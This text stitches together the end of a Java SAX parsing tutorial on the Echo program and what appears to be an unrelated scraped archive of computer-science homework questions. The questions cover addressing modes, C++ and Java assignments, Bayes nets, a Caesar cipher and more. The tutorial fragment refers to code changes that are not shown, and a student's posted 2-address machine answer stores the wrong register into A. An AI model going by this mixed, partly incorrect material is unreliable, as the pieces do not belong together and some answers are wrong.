This code sets up an indent string, keeps track of the current indent level, and outputs the indent string whenever the nl() method is called. If you set the indent string to "", the output will not be indented. (Try it. You'll see why it's worth the work to add the indentation.)
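The bookkeeping can be sketched apart from the parser. In this hypothetical demo (names and indent width are assumptions), the level is incremented before printing a start tag and decremented after printing an end tag, as in the changes above:

```java
// Isolated sketch of the indentation bookkeeping:
// nl() writes a newline followed by indentLevel copies of the indent string.
public class IndentDemo {
    private static final String INDENT = "  "; // assumed indent width
    private static int indentLevel = 0;
    private static final StringBuilder out = new StringBuilder();

    static void nl() {
        out.append('\n');
        for (int i = 0; i < indentLevel; i++) out.append(INDENT);
    }

    // Simulates the event order for <slide><title/></slide>.
    public static String render() {
        out.setLength(0);
        indentLevel = 0;
        indentLevel++; nl(); out.append("ELEMENT: <slide>");   // start at level 1
        indentLevel++; nl(); out.append("ELEMENT: <title>");   // start at level 2
        nl(); out.append("END_ELM: </title>"); indentLevel--;  // end printed at level 2
        nl(); out.append("END_ELM: </slide>"); indentLevel--;  // end printed at level 1
        return out.toString();
    }

    public static void main(String[] args) {
        System.out.println(render());
    }
}
```

Setting INDENT to "" reproduces the flat, unindented output the tutorial mentions.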
You'll be happy to know that you have reached the end of the "mechanical" code in the Echo program. From this point on, you'll be doing things that give you more insight into how the parser works. The steps you've taken so far, though, have given you a lot of insight into how the parser sees the XML data it processes. You have also gained a helpful debugging tool that you can use to see what the parser sees.
Inspecting the Output
Here is part of the output from this version of the program:
Note: The complete output is Echo03-01.txt. (The browsable version is Echo03-01.html.)
Note that the characters() method is invoked twice in a row. Inspecting the source file slideSample01.xml shows that there is a comment before the first slide. The first call to characters() comes before that comment. The second call comes after. (Later, you'll see how to be notified when the parser encounters a comment, although in most cases you won't need such notifications.)
Note, too, that the characters() method is invoked after the first slide element, as well as before. When you are thinking in terms of hierarchically structured data, that seems odd. After all, you intended for the slideshow element to contain slide elements and not text. Later, you'll see how to restrict the slideshow element by using a DTD. When you do that, the characters() method will no longer be invoked.
In the absence of a DTD, though, the parser must assume that any element it sees contains text, such as that in the first item element of the overview slide. Here, the hierarchical structure looks like this:

    ELEMENT: <item>
    CHARS:   Why
    ELEMENT:   <em>
    CHARS:     WonderWidgets
    END_ELM:   </em>
    CHARS:   are great
    END_ELM: </item>
Documents and Data
In this example, it's clear that there are characters intermixed with the hierarchical structure of the elements. The fact that text can surround elements (or be prevented from doing so with a DTD or schema) helps to explain why you sometimes hear talk about "XML data" and other times hear about "XML documents." XML comfortably handles both structured data and text documents that include markup. The only difference between the two is whether or not text is allowed between the elements.
Note: In a later section of this tutorial, you will work with the ignorableWhitespace method in the ContentHandler interface. This method can be invoked only when a DTD is present. If a DTD specifies that slideshow does not contain text, then all the whitespace surrounding the slide elements is by definition ignorable. On the other hand, if slideshow can contain text (which must be assumed to be true in the absence of a DTD), then the parser must assume that the spaces and lines it sees between the slide elements are significant parts of the document.
Computer Science Archive: Questions from November 01, 2011
- Anonymous asked: I want to know whether I have solved the example below correctly; please check it.
Write the code to implement the expression A = (B+C) * (D + E) for
1) 3-address machines
2) 2-address machines
3) 1-address machines
4) 0-address machines
Solution:
Let B+C = M
And D+E = N
Writing code to implement the given expression i.e. A = (B+C) * (D + E)
3-Address
add M,B,C
add N,D,E
mul A,M,N
2-Address
load M,B
add M,C
load N,D
add N,E
mul N,M
store A,M
1-Address
lda B
adda C
sta M
lda D
adda E
sta N
mula M
sta A
0-Address
push B
push C
add
push D
push E
add
mul
pop A
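As a quick sanity check of the 0-address sequence above, a tiny hypothetical stack machine (all names invented) can execute it and confirm the result equals (B+C)*(D+E):

```java
import java.util.ArrayDeque;
import java.util.Deque;

// Executes the 0-address sequence from the question:
// push B, push C, add, push D, push E, add, mul, pop A
public class StackMachineCheck {
    private final Deque<Integer> stack = new ArrayDeque<>();

    void push(int v) { stack.push(v); }
    void add()       { stack.push(stack.pop() + stack.pop()); }
    void mul()       { stack.push(stack.pop() * stack.pop()); }
    int pop()        { return stack.pop(); }

    public static int evaluate(int b, int c, int d, int e) {
        StackMachineCheck m = new StackMachineCheck();
        m.push(b); m.push(c); m.add(); // B + C
        m.push(d); m.push(e); m.add(); // D + E
        m.mul();                       // (B + C) * (D + E)
        return m.pop();                // pop A
    }

    public static void main(String[] args) {
        System.out.println(evaluate(1, 2, 3, 4)); // (1+2)*(3+4) = 21
    }
}
```

The variable values here are arbitrary test data; any values give A == (B+C)*(D+E).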
- Anonymous asked: Analyze and draw a "Cross Reference Matrix" to identify/show different reports and attributes, ...
- EducatedRabbit5024 asked:
How can I fix this debug "error"?
"error C2065: 'list' : undeclared identifier"
Program is here:
// : Defines the entry point for the console application.
//
#include<iostream>
#include<fstream>
#include<cctype>
using namespace std;
void initialize(int& lc, int list[]);
void copyText(ifstream& intext, ofstream& outtext, char& ch, int list[]);
void characterCount(char ch, int list[]);
void writeTotal(ofstream& outtext, int lc, int list[]);
int main()
{
//Step 1: Declare Variables
int lineCount;
int letterCount[26];
char ch;
ifstream infile;
ofstream outfile;
infile.open("textin.txt");
if (!infile)
{
cout << "Cannot open the input file."
<< endl;
}
outfile.open("textout.out");
initialize(lineCount, letterCount);
infile.get(ch);
while (infile)
{
copyText(infile, outfile, ch, letterCount);
lineCount++;
infile.get(ch);
}
writeTotal(outfile, lineCount, letterCount);
infile.close();
outfile.close();
system("pause");
return 0;
}
void initialize(int& lc, int list[])
{
int j;
lc = 0;
for (j = 0; j < 26; j++)
list[j] = 0;
} // end initialize
void copyText(ifstream& intext, ofstream& outtext, char& ch,
int list[])
{
while (ch != '\n')
{
outtext << ch;
characterCount (ch, list);
intext.get(ch);
}
outtext << ch;
}
void characterCount(char ch, int lst[])
{
int index;
ch = toupper(ch);
index = static_cast<int>(ch) - static_cast<int>('A');
if (0 <= index && index < 26)
list[index]++;
} // end characterCount
void writeTotal(ofstream& outtext, int lc, int list[])
{
int index;
outtext << endl << endl;
outtext << "The number of lines = " << lc << endl;
for (index = 0; index < 26; index++)
outtext<< static_cast<char>(index + static_cast<int>('A'))
<<" count = " << list[index] << endl;
}// end writeTotal
- Anonymous asked:
a. ) What is v?
b.) If Alice chooses r = 10, what does Alice send in the first message?
c.) Suppose Alice chooses r = 10 and Bob sends e = 0 in message two. What does Alice send in the third message?
d.) Suppose Alice chooses r = 10 and Bob sends e = 1 in message two. What does Alice send in the third message?
- Anonymous asked: Question No.1
A well reputed Multinational Company urgently requires marketing executives for its Islamabad branch. In order to be successful in this position; the candidate must be qualified to degree level or equivalent and must have experience in e-marketing. Good IT skills are necessary and an understanding of HTML is required. The candidate should have excellent interpersonal and communicational skills. Your detailed resume should reach by 20th November 2011 to 843, CII Gulberg Lahore.
Question No.2
Arrange five pairs of matching statements from the following and do tell us which principle of communication has been used?
(Clarity, courtesy, consideration, conciseness, concreteness, completeness, correctness.)
1. After planning 10,000 berry plants, the deer came into out botanist's farm and crushed them.
2. I am sorry the point was not clear; here is another version.
3. I rewrote that letter three times; the point was clear.
4. I am delighted to announce that we have extended our office hours to make shopping more convenient.
5. You will be able to shop evenings with the extended office hours.
6. After our botanists had planted 10,000 berry plants, the deer came into the farm and crushed them.
7. In 1996 the GMAT scores averaged 600; by 1997 they had risen to 610.
8. We hereby wish to let you know that our company is pleased with the confidence you have reposed in us.
9. Students’ GMAT scores are higher.
10. We appreciate your confidence.
- Anonymous asked: You are required to write a program for the BILLING SYSTEM of a vir... Problem.
- Anonymous asked: "Commonly it is considered that the degree of multiprogramming affects CPU utilization and always increases CPU utilization." In either case, "yes" or "no", justify the given statement with strong arguments. Write the answer in your own words.
- Anonymous asked: Question 1: Show that ~(p V (~p Λ q)) ≡ ~...
- Anonymous asked: "Commonly it is considered that the degree of multiprogramming affects CPU utilization and always increases CPU utilization." In either case, "yes" or "no", justify the given statement with strong arguments.
- MachoBattleship218 asked: Question Details
1)Create a new Java file called Lab1.java.
2)Write code to display a dialog box with text "Part One" and an OK button.
3)Declare two integers num1 and num2.
4) Assign a random number in the range 1-24 to variable num1. Here's how:
// number of possible values \ / lowest possible value
// | |
// v v
num1 = (int)( Math.random() * 24 ) + 1; // random number in range 1-24
5)Assign a random number in the range 10-30 to variable num2.
6)Create an input dialog box that shows the numbers to the user, then asks the user to type in the operation to be performed. The dialog box text should look like this (use a newline character to add a line break):
The numbers are num1 and num2.
Would you like to add or multiply the numbers?
7) Create an if-else-if statement that compares what the user entered to character string add, then compares to multiply. Ignore whether the letters are in uppercase or lowercase. HINT: use the equalsIgnoreCase() method.
8) If the user entered add, add the numbers and display the result in a dialog box as follows:
num1 plus num2 is equal to answer.
9) If the user entered multiply, multiply the numbers and display the result in a dialog box as follows:
num1 times num2 is equal to answer.
10) In all other cases, display an error message. Change the icon in the dialog box to a red X and display ERROR in the title bar of the dialog box.
11)Write code to display a dialog box with text "Part Two" and an OK button.
12) Declare two String variables called name1 and name2.
13) Use dialog boxes to prompt the user to enter in two last names, one after the other.
14)Once entered, display the names in a dialog box as follows:
You entered name1 and name2.
15 Find out what happens if the user clicks on the Cancel button instead of entering a name?
16)Add if statements to your code to check whether the user hit the Cancel button for either name. More specifically, if the user hits the Cancel button, display the following message in a dialog box, then exit the program:
Thanks anyways. Click OK to exit.
17)Add if statements to determine if the names entered by the user are the same. Use the equals() method to do so. If the names are the same, display the following message in a dialog box, then exit the program:
Duplicate names detected. Click OK to exit.
18) At this point in the code, we know that two names have been entered by the user and that each name is different. Add if statements to display the names in alphabetical order in a dialog box. Use the compareTo() method to determine the correct order of variables name1 and name2.
- Anonymous asked: QUESTION:
Each unit in a Latin textbook contains a Latin-English vocabulary of words that have been used for the first time in a particular time. Write a program that converts a set of such vocabularies stored in file Latin in to a set of English-Latin vocabularies. Make the following assumptions:
a. Unit names are preceded by a percentage symbol.
b. There is only one entry per line.
c. A Latin word is separated by a colon from its English equivalent(s); if there is more than one equivalent, they are separated by a comma.
To output English words in alphabetical order, create a binary search tree for each unit containing English words and linked lists of Latin equivalents. Make sure that there is only one node for each English word in the tree. For example, there is only one node for and, although and is used twice in unit 6: with words ac and atque. After the task has been completed for a given unit (that is, the content of the tree has been stored in an output file), delete the tree along with all linked lists from computer memory before creating a tree for next unit.
Here is an example of a file containing Latin-English vocabularies:
%Unit 5
ante : before, in front of, previously
antiques : ancient
ardeo : burn, be on fire, desire
arma : arms, weapons
aurum : gold
aureus : golden, of gold
%Unit 6
animal : animal
Athenae : Athens
atque : and
ac : and
aurora : dawn
%Unit 7
amo : love
amor : love
annus : year
Asia : Asia
From these units, the program should generate the following output:
%Unit5
ancient : antiques
arms : arma
be on fire : ardeo
before : ante
burn : ardeo
desire : ardeo
gold : aurum
golden : aureus
in front of : ante
of gold : aureus
previously : ante
weapons : arma
%Unit 6
Athens : Athenae
and : ac, atque
animal : animal
dawn : aurora
%Unit 7
Asia : Asia
love : amor, amo
year : annus
- Yoshi1 asked: Please help! I really appreciate your assistance! I wish I had experience with Java :( Thank you so very much!!
----------------------------------------------------------------------------
Write a program for keeping a course list for each student in a college. The information about each
student should be kept in an object that contains the student's name and a list of courses completed by
the student. The courses taken by a student are stored as a linked list in which each node contains the
name of a course, the number of units for the course, and the course grade. The program gives a menu
with choices that include adding a student's record, deleting a student's record, adding a single course
record to a student's record, deleting a single course record from a student's record, and printing a
student's record to the screen. The program input should accept the student's name in any combination of
upper- and lowercase letters. A student's record should include the student's GPA (grade point average)
when displayed on the screen. When the user is through with the program, the program should store the
records in a file. The next time the program is run, the records should be read back out of the file,
and the list should be reconstructed. (Ask your instructor if there are any rules about what type of
file you should use.)

Note: You can use any type of file that you choose. A text file will be the easiest to demonstrate that the data is correct.
- Anonymous asked: A game of Jumble
You are to create a game of Jumble for your friends to play. You are provided with a dictionary of words to use, ‘dict.txt’. Your program will randomly select a word from the list, scramble it and then allow the user ten attempts to guess the word. If they guess it on or before 10 tries, the game issues a congratulatory message and terminates. If they do not guess it in 10 tries, they are told the word and the program terminates.
Read through the assignment carefully. You may wish to create a smaller dictionary with only a few words in it until your program is functioning – and then plug in the real dictionary file. Your program should run regardless of the number of lines in the dictionary.
You must use the functions specified. I would recommend tackling the problem in the following order. Do not move on until you’re convinced each prior piece is fully functional!
Generating random numbers
Write a function called myrandint. This function will create and return a random integer in the range specified by input arguments low and high. The function will use the rand function. Look through your notes, we’ve written this function more than once in class. A sample function invocation:
% put a random integer between 1 and 10 (inclusive) in variable r
>> r = myrandint(1,10);
Fully test this function. Run it enough times to convince yourself that all values in the range are possible and that no values outside of the range are occurring.
Scrambling words
Write a function scramble_word that takes a string as an input argument. The function randomly scrambles the letters in the string and returns the scrambled word. We’ll discuss an algorithm to accomplish the scrambling in class.
>> word = scramble_word('hello')
word =
lhloe
Because the scrambling is random, a subsequent call will likely produce a different outcome:
>> word = scramble_word('hello')
word =
ohlle
- Anonymous asked: A CPU executes instructions at 800 MIPS.
Data can be copied 64 bits at a time, with each
64-bit word copied costing six instructions. If an
incoming frame has to be copied twice, how much
bit rate, at most, of a line can the system handle?
(Assume that all instructions run at the full
800-MIPS rate.)
- ElegantGuitar8315 asked: A material is tested for cyclic fatigue failure, whereby a stress, in MPa, is applied to the material and the number of cycles needed to cause failure is measured. Write a program in C++ that calculates the least-squares regression to find the best fit for the data in question. Give the user the choice of using a straight-line regression or transforming the data by taking the log of both the x and y data and performing a linear regression on the transformed data. The output from the program should be the intercept and the slope of the regression line as well as the coefficient of determination. Use the data below to test your program:
N (Cycles)   Stress (MPa)
1            1100
10           1000
100          925
1000         800
10000        625
100000       550
1000000      420
- Anonymous asked
- CarleneGriffiths asked: There are 2 parts for this code.
1. Add a delay at the appropriate point in this program to make the binary value displayed change in an easy-to-predict way each time you activate dipswitch 8.
2. Add a 2 second delay in the while loop to slow the counter down. This is enough time to set switch 8 in intervals that causes the LEDs to count up one at a time.
Here is the code to modify:
//RAM variables
char var1; // holds current value of incrementing variable
//function prototypes
void init_PortH_INT(void);
void delay(int); // you figure out where to use it!
//Main Function
void main(){
DDRB = 0xff; // initialize Port B
DDRJ = 2;
PTJ = 0;
init_PortH_INT();
while(1){ // resume auto-incrementing value in var1
var1++;
} /* a repetitive task is performed by main */
}
/***************** function *******************/
#pragma CODE_SEG NON_BANKED
interrupt 25 void PortH_ISR (void){ //(((0x10000-Vporth)/2)-1)
PORTB = var1; // latch current value of var1 to Port B
PIFH |= 0x80; // clear port interrupt flag
}
#pragma CODE_SEG DEFAULT
void init_PortH_INT( ){ // dipswitch 8 becomes FE trig for INT
asm(sei);
DDRH &= ~0x80; // PH7 inputs (dipswitch 8)
PPSH = 0x00; // define FE trigger for INT (PH7, etc.)
PIFH |= 0x80; // clear port INT flag by sending a '1'
PIEH |= 0x80; // enable PH7 for port INT
asm(cli);
}
void delay(int del){ // delay for 'del' msecs
int i,j;
for(i=0; i<del; i++)
for(j=0; j<4000; j++);
}
- Anonymous asked: In 1000BASE-X, a frame of 64 bytes is first block coded with 8B/10B before transmitting. Suppose the propagation speed is 2 × 10^8 m/s. What is the frame "length" in "meters"? (Suppose the cable is 500 m long.)
- CarleneGriffiths asked
- CarleneGriffiths asked: 7. Write the C statements needed to place the address of an interrupt service routine that is to be c...
- CarleneGriffiths asked: 9. Use Quartus II to write, compile and simulate a .vhd file that outputs an active-LOW pulse for inp...
- Anonymous asked: I need help with the basic setup and action listeners for this. I have no idea how to do GUI and the action listeners.
I need to make a basic GUI that has 5 buttons and 2 text fields: 1 button at the top for choosing a file, then a text field for typing a search item, then four buttons that are different types of searches through the file. The last text field will be for output. I don't need the code for the search; I just need help with the basic layout and how to do listeners for this stuff. The file will be read and put into objects, which are then put into a container, so I am really searching the container after the file is chosen and read in. I can do all of that; I just need a little help with the GUI aspects. Anyone who gives me some contribution will get lifesaver. I don't want my work done for me, I just want help understanding this. THANKS in advance!!
- Anonymous asked: Write the C++ DynArray class. Here is a brief description of all of the class functions that your class should include:
• No-argument constructor – initializes a DynArray object to being empty.
• One-argument constructor – uses dynamic memory allocation to obtain a contiguous block of memory for storing n int values, where n is its argument.
• show – displays the nth element in the DynArray. If the DynArray is empty or if n is an invalid index, this function should generate an error message.
• set – will set the nth element in the DynArray to x, where n is the value of its first argument and x is value of its second argument. If the DynArray is empty or if n is an invalid index, this function should generate an error message.
• expand – will take an existing DynArray and expand its size by its argument, s. Hint: To expand a DynArray, allocate a new, larger block of dynamic memory, copy the values from the old DynArray to the new memory, and deallocate the old memory.
• A destructor to deallocate dynamic memory when a DynArray object passes out of scope. (1 answer)
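The functions above map naturally onto a small class. The following is a hypothetical sketch, not the required solution: the error handling (a message on std::cerr) is one reasonable reading of "generate an error message", and the `get`/`length` helpers are additions for illustration only.

```cpp
#include <cassert>
#include <iostream>

// Hypothetical sketch of the DynArray described above.
class DynArray {
public:
    DynArray() : data(nullptr), size(0) {}                    // empty array
    explicit DynArray(int n) : data(new int[n]()), size(n) {} // n zeroed ints
    ~DynArray() { delete[] data; }                            // free memory

    void show(int n) const {            // display the nth element
        if (!valid(n)) { std::cerr << "error: invalid index\n"; return; }
        std::cout << data[n] << '\n';
    }
    void set(int n, int x) {            // set the nth element to x
        if (!valid(n)) { std::cerr << "error: invalid index\n"; return; }
        data[n] = x;
    }
    void expand(int s) {                // grow by s: allocate, copy, free
        int* bigger = new int[size + s]();
        for (int i = 0; i < size; ++i) bigger[i] = data[i];
        delete[] data;
        data = bigger;
        size += s;
    }
    int get(int n) const { return valid(n) ? data[n] : 0; }   // test helper
    int length() const { return size; }                       // test helper

private:
    bool valid(int n) const { return data != nullptr && n >= 0 && n < size; }
    int* data;
    int size;
};
```

A complete version would also follow the rule of three (copy constructor and copy assignment), which the assignment's list does not mention.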
- hamadja asked: Part I
Create a text file that stores student ID, name, major and GPA (a float between 0 and 4) for at least 10 students. Your file may look like:
1 James ben CS 3.1
2 Wilson Dixit CE 2.7
……..
And so on.
Part II
Write a C++ program that uses the file from Part I in the following manner.
a. Display all the contents of the file in a formatted fashion (tabular format) with the first row being a title or header row.
b. Display a list of all student’s names whose GPA is less than 2.0.
c. Prompt the user to input a major and your program will print out how many students are studying that major.
d. Your program should display the above options as a menu, where the user will choose the task to carry out. Once the user decides to stop, the program should allow them to choose exit or stop from the same menu. Your main menu should look like:
Please type in your choice
a. Display file contents
b. List students with low GPA
c. Count students per a given major
d. Stop or exit (1 answer)
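The record handling behind options (b) and (c) can be sketched as below, assuming the Part I layout (id, first name, last name, major, GPA per line). The struct and function names are illustrative, not prescribed by the assignment, and reading from a generic stream makes the logic testable without a real file.

```cpp
#include <cassert>
#include <istream>
#include <sstream>
#include <string>
#include <vector>

struct Student {
    int id;
    std::string first, last, major;
    double gpa;
};

// Read whitespace-separated records until the stream runs out.
std::vector<Student> readStudents(std::istream& in) {
    std::vector<Student> out;
    Student s;
    while (in >> s.id >> s.first >> s.last >> s.major >> s.gpa)
        out.push_back(s);
    return out;
}

// Option (b): names of students whose GPA is below 2.0.
std::vector<std::string> lowGpaNames(const std::vector<Student>& v) {
    std::vector<std::string> names;
    for (const Student& s : v)
        if (s.gpa < 2.0)
            names.push_back(s.first + " " + s.last);
    return names;
}

// Option (c): count students in the given major.
int countMajor(const std::vector<Student>& v, const std::string& major) {
    int n = 0;
    for (const Student& s : v)
        if (s.major == major)
            ++n;
    return n;
}
```

In the full program, the same `readStudents` would be fed a `std::ifstream` opened on the Part I file; the third record below is invented test data.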
- Anonymous asked: Write a calculator application.
Use a grid layout to arrange buttons for the digits and for the + - × ÷ operations.
Add a text field to display the result.
Your main class should be called Calculator.
(2 answers)
- GreedyEgg5276 asked: Creating a word counting program (p. 554, Chapter 9: Pointers)
5. getString and getWordCount Function
This 1st part is the same as last week's assignment, on which you will build:
=================================
Write a function named getString that has a local char array of 80 elements.
The function should ask the user to enter a sentence, and store the sentence
in the array. Then the function should dynamically allocate a char array
just large enough to hold the sentence, plus the null terminator. It should
copy the sentence to the dynamically allocated array, and then return a
pointer to the array. Demonstrate the function in a complete program.
========================================
Now you need to parse the line entered and provide a count of words entered.
For this assignment, a word consists of "white space" surrounding a "sequence of alphanumeric chars".
You may need to reference the ASCII table in your book for "white space" chars. For this, "white space"
is space (or blank) and \t, and alphanumeric is uppercase A to Z, lowercase a to z, and digits 0 to 9.
Note: You need to write your own string copy function, not use the standard library version. (1 answer)
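A possible shape for the two pieces, sketched here: a hand-written copy loop (per the note above) and a word counter that treats a word as a maximal run of alphanumeric characters. The function names are assumptions, and the interactive buffer/`main` demonstration is omitted so the logic can be tested in isolation.

```cpp
#include <cassert>

// Hand-written string copy, as the note requires (no strcpy).
void myStringCopy(char* dest, const char* src) {
    while ((*dest++ = *src++) != '\0') {}
}

// A-Z, a-z, 0-9, per the assignment's definition of alphanumeric.
bool isWordChar(char c) {
    return (c >= 'A' && c <= 'Z') || (c >= 'a' && c <= 'z') ||
           (c >= '0' && c <= '9');
}

// Allocate a buffer just large enough for the sentence plus '\0',
// copy the sentence into it, and return the pointer (caller delete[]s).
char* duplicateString(const char* line) {
    int len = 0;
    while (line[len] != '\0') ++len;
    char* copy = new char[len + 1];
    myStringCopy(copy, line);
    return copy;
}

// Count maximal runs of alphanumeric characters.
int countWords(const char* s) {
    int words = 0;
    bool inWord = false;
    for (; *s != '\0'; ++s) {
        if (isWordChar(*s)) {
            if (!inWord) ++words;   // a new word starts here
            inWord = true;
        } else {
            inWord = false;         // space, tab, or other separator
        }
    }
    return words;
}
```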
- Anonymous asked (1 answer)
- Anonymous asked: Critique Lai and Gray's virus prevention mechanism described in Section 19.6.2.2. In particular, … (0 answers)
- Anonymous asked: Develop a lexical analyzer that recognizes only arithmetic expressions, including variable names and … (0 answers)
- Anonymous asked: Write a program that can "encrypt" a word using a Caesar cipher (shifting a character K distance away). You are essentially manipulating the ASCII value of each character. To "encrypt", simply add K to the character value. Restrict the valid range to human-readable characters (i.e. ASCII values between 32 and 126, inclusive). The program should allow the user to "encrypt" multiple words.
Example:
Cryptography program!!!
Input a shifting distance that's less than 10: 2
Input a word: Hello
Encrypted word is:
Jgnnq
Do you still want to continue?[y/n]: y
Input a word: World
Encrypted word is:
Yqtnf
Do you still want to continue?[y/n]: N (1 answer)
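The shift-and-wrap step reduces to one helper. There are 95 printable values in the 32–126 range, so adding K modulo 95 keeps the result human-readable; the function name is illustrative.

```cpp
#include <cassert>
#include <string>

// Shift each character K positions within ASCII 32..126 (95 values),
// wrapping around at the top of the range.
std::string caesarEncrypt(const std::string& word, int k) {
    std::string out = word;
    for (char& c : out)
        c = static_cast<char>(32 + (c - 32 + k) % 95);
    return out;
}
```

With k = 2 this reproduces the sample run above ("Hello" becomes "Jgnnq").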
- Anonymous asked: Hi, it seems you do not have Program #3 on page 598 in the book "Starting Out with Java… (1 answer)
- Anonymous asked: Analyze and draw a "Cross Reference Matrix" to identify/show different reports and attributes, wh… (0 answers)
- Anonymous asked: You are a consultant and have been brought in to assist the Southwestern Hospital Group (SHG) with i… (1 answer)
- Anonymous asked: Implement an infinite StackOfObjects class: the elements in the stack are stored in an array named elements. When you create a stack, the array is also created. The no-arg constructor creates an array with the default capacity of 2. The variable size counts the number of elements in the stack, and size – 1 is the index of the element at the top of the stack. The size should be increased if there is a need for more space in the stack.
Implement a push method to push an object into the top of the stack and a pop method to return and remove the top element from the stack. Implement a peep method to return the top element from the stack without deleting it. Implement an isEmpty method to check if the stack contains any elements. Implement an access method for the size field.
All fields should be accessible only from inside the class, while all methods should be accessible from any other class.
Implement an infinite StackOfIntegers that has StackOfObjects as a super class. It also implements an extra method: sumElements to compute the sum of its elements.
Write a comprehensive test (test all methods at least twice) for this stack. Create at least 4 instances of both of these classes StackOfObjects and StackOfIntegers (1 stack of Strings, 1 stack of integers, 1 stack of Rectangles, 1 stack of Circles from the textbook and lecture notes).
Please help! (0 answers)
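The assignment itself is in Java; as a language-neutral illustration of the grow-on-demand idea, here is a C++ sketch of the same stack (default capacity 2, resizing when full). Doubling the capacity is an assumption: the spec only says the size "should be increased".

```cpp
#include <cassert>

// Minimal resizable stack of ints illustrating the spec above.
class Stack {
public:
    Stack() : capacity(2), size(0), elements(new int[2]) {}
    ~Stack() { delete[] elements; }

    void push(int x) {
        if (size == capacity) grow();        // make room before storing
        elements[size++] = x;
    }
    int pop() { return elements[--size]; }          // remove and return top
    int peep() const { return elements[size - 1]; } // top, without removing
    bool isEmpty() const { return size == 0; }
    int getSize() const { return size; }

private:
    void grow() {                        // double the capacity (assumption)
        int* bigger = new int[capacity * 2];
        for (int i = 0; i < size; ++i) bigger[i] = elements[i];
        delete[] elements;
        elements = bigger;
        capacity *= 2;
    }
    int capacity, size;
    int* elements;
};
```

The Java version would make `elements` an `Object[]`, with `StackOfIntegers` extending it and adding `sumElements`.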
- Anonymous asked: In your local nuclear power station, there is an alarm that senses when a temperature gauge excee…
a) Draw a Bayesian network for this domain, given that the gauge is more likely to fail when the core temperature gets too high.
b) Is your network a polytree? Why or why not?
c) Suppose there are just two possible actual and measured temperatures, normal and high; the probability that the gauge gives the correct temperature is x when it is working, but y when it is faulty. Give the conditional probability table associated with G.
d) Suppose the alarm works correctly unless it is faulty, in which case it never sounds. Give the conditional probability table associated with A.
e) Suppose the alarm and gauge are working and the alarm sounds. Calculate an expression for the probability that the temperature of the core is too high, in terms of the various conditional probabilities in the network. (0 answers)
- Anonymous asked: Consider the Bayes net shown in Figure 14.23 (displayed above).
a) Which of the following are asserted by the network structure?
(i) P(B, I, M) = P(B)P(I)P(M)
(ii) P(J | G) = P(J | G, I)
(iii) P(M | G, B, I) = P(M | G, B, I, J)
b) Calculate the value of P(b, i, not m, g, j).
c) Calculate the probability that someone goes to jail given that they broke the law, have been indicted, and face a politically motivated prosecutor.
d) A context-specific independence allows a variable to be independent of some of its parents given certain values of others. In addition to the usual conditional independences given by the graph structure, what context-specific independences exist in the Bayes net in Figure 14.23? (Displayed above)
e) Suppose we want to add the variable P = PresidentialPardon to the network; draw the new network and briefly explain any links you add. (0 answers)
- DirtyPawn7728 asked: Given the following structure:
struct color
{
int red;
int green;
int blue;
};
Write the following functions:
(a) struct color make_color(int red, int green, int blue);
Returns a color structure containing the specified red, green, and blue
values. If any argument is less than zero, the corresponding member will
contain zero instead. If any argument is greater than 255, it will contain
255.
(b) int getRed(struct color c);
Return the value of c's red member.
(c) bool equal_color(struct color c1, struct color c2);
Returns true if the two colors corresponding values are equal.
(d) struct color brighter(struct color c);
Returns a color structure that represents a brighter version of the color
c. The struct is identical to c, except that each member has been divided
by 0.7 (with the result truncated to an integer). However, there are three
special cases: (1) If all members of c are zero, the function returns a
color whose members all have the value 3. (2) If any member of c is
greater than 0 but less than 3, it is replaced by 3 before the division by
0.7. (3) If dividing by 0.7 causes a member to exceed 255, it is reduced
to 255.
(e) struct color darker(struct color c);
Returns a color structure that represents a darker version of the color c.
The structure is identical to c, except that each member has been
multiplied by 0.7 (with the result truncated to int). (1 answer)
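A sketch of the five functions, following the clamping and special-case rules as written above. The `clampChannel` helper is an addition for illustration; it is not part of the assignment's interface.

```cpp
#include <cassert>

struct color { int red, green, blue; };

static int clampChannel(int v) {        // helper (not in the assignment)
    if (v < 0) return 0;
    if (v > 255) return 255;
    return v;
}

color make_color(int red, int green, int blue) {
    color c = { clampChannel(red), clampChannel(green), clampChannel(blue) };
    return c;
}

int getRed(color c) { return c.red; }

bool equal_color(color c1, color c2) {
    return c1.red == c2.red && c1.green == c2.green && c1.blue == c2.blue;
}

color brighter(color c) {
    if (c.red == 0 && c.green == 0 && c.blue == 0)
        return make_color(3, 3, 3);                 // special case (1)
    int ch[3] = { c.red, c.green, c.blue };
    for (int i = 0; i < 3; ++i) {
        if (ch[i] > 0 && ch[i] < 3) ch[i] = 3;      // special case (2)
        ch[i] = static_cast<int>(ch[i] / 0.7);      // divide, truncate
        if (ch[i] > 255) ch[i] = 255;               // special case (3)
    }
    return make_color(ch[0], ch[1], ch[2]);
}

color darker(color c) {
    color d = { static_cast<int>(c.red * 0.7),
                static_cast<int>(c.green * 0.7),
                static_cast<int>(c.blue * 0.7) };   // multiply, truncate
    return d;
}
```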
- Anonymous asked: Determine the output displayed when the button is clicked.
Private Sub btnDisplay_Click(...) Handles btnDisplay.Click
Dim num As Double = 0
Dim max As Double = -1
Dim prompt As String = "Enter a nonnegative number. " & "Enter -1 to terminate entering numbers."
num = CDbl(InputBox(prompt))
Do While num >= 0
If num > max Then
max = num
End If
num = CDbl(InputBox(prompt))
Loop
If max <> -1 Then
MessageBox.Show("Maximum number: " & max)
Else
MessageBox.Show("No numbers were entered.")
End If
(Assume that the responses are 4, 7, 3, and -1) (1 answer)
- Anonymous asked: Write a program to find the largest of five numbers obtained from the user with an input dialog box. (1 answer)
- Anonymous asked:
#include <iostream>
//#include <cmath>
using namespace std;
double absolute(double num);
double rad_degrees(double num1); //declaring functions
double tanInverse(double num2);
int main ()
{
double num;
double input,finalResult;
for(double I=2.0; I<6.0; I+= 1.0)
{
double S0 = I;
double S1 = 0.5 * S0;//guess of initial square root value is half of s0
double S2 = S0;
num=absolute(S1-S2);
while(num> 0.0001)
{
S1= S2;
S2= 0.5*(S1+(S0/S1));
num=absolute(S1-S2);
}//while
//cout I and s2
cout << "The square root of " << S0 << " is " << S2 << endl;
}
for(int i=0;i<3;i++)
{
cout<<"\nEnter a value in radians for finding tan inverse\n";
cin>>input;
finalResult=tanInverse(input); //input for finding tan inverse value
cout<<"Result is "<<finalResult<<" \n";
cout.setf(ios::fixed);
cout.setf(ios::showpoint);
cout.precision(5);
}
system("pause");
return 0;
}//main
double absolute(double num)
{
if(num<0)
num = -num;
return num;
}
double rad_degrees(double num1) // function for converting radians to degrees
{
double num11;
num11 = num1 * (180/3.14159265); // pI = 3.14159265
return num11;
}
double tanInverse(double x) // function for finding tan inverse for a value
{
double T1,Den,power,sign,T2,y;
y=1;
